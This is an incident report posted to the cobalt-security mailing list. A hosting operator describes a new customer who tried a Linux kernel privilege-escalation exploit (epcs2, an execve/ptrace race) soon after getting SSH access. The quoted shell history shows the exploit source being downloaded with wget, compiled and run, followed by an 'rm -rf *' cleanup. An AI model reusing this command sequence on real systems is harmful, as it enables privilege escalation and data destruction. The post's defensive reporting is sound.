[cobalt-security] Attempted inside job. A report.

[Michael Stauber <cobalt@xxxxxxxxxxxxxx>]

Hi all,

I'm very much aware of server security and in fact it's part of the business. 
We also offer webhosting, mostly for friends, colleagues and for charity 
purpose.  

We usually don't give shell access to customers, unless to a selected few 
that I trust that they know what they're doing. Well, just today someone 
signed up for one of the biggest and most expensive webhosting package we 
offer and during the email exchange he asked for shell access through SSH.

I granted that request and tuned my IDS software a little. Just minutes after 
the setup email had been sent (credit card had checked out fine) I got paged 
with the following report from my IDS software:

WARNING: --COMPILER ACCESS by user XXXXX!---

And that's the .bash_history of that user:

users
wget
uname -a
wget http://www.securityinfos.com/hackcoza/exploits/os/linux/suse/7.1/epcs2.c
gcc -o e epcs2.c
./e
./e
./e
./e
./e
./e
rm -rf *
ls
exit

That's what epcs2.c is about:

* epcs2 (improved by lst [liquid@xxxxxxx])
* ~~~~~~~
* exploit for execve/ptrace race condition in Linux kernel up to 2.2.18

That exploit is fixed in the Cobalt Kernels 2.2.16's, so his attempt didn't 
work. I cross checked it by downloading , compiling and testing this exploit. 


My advice:

- Never ever give shell access to anyone
- if you're still running a 2.2.14 kernel you should hurry up to install the 
kernel patch from the Cobalt download page.


-- 

With best regards,

Michael Stauber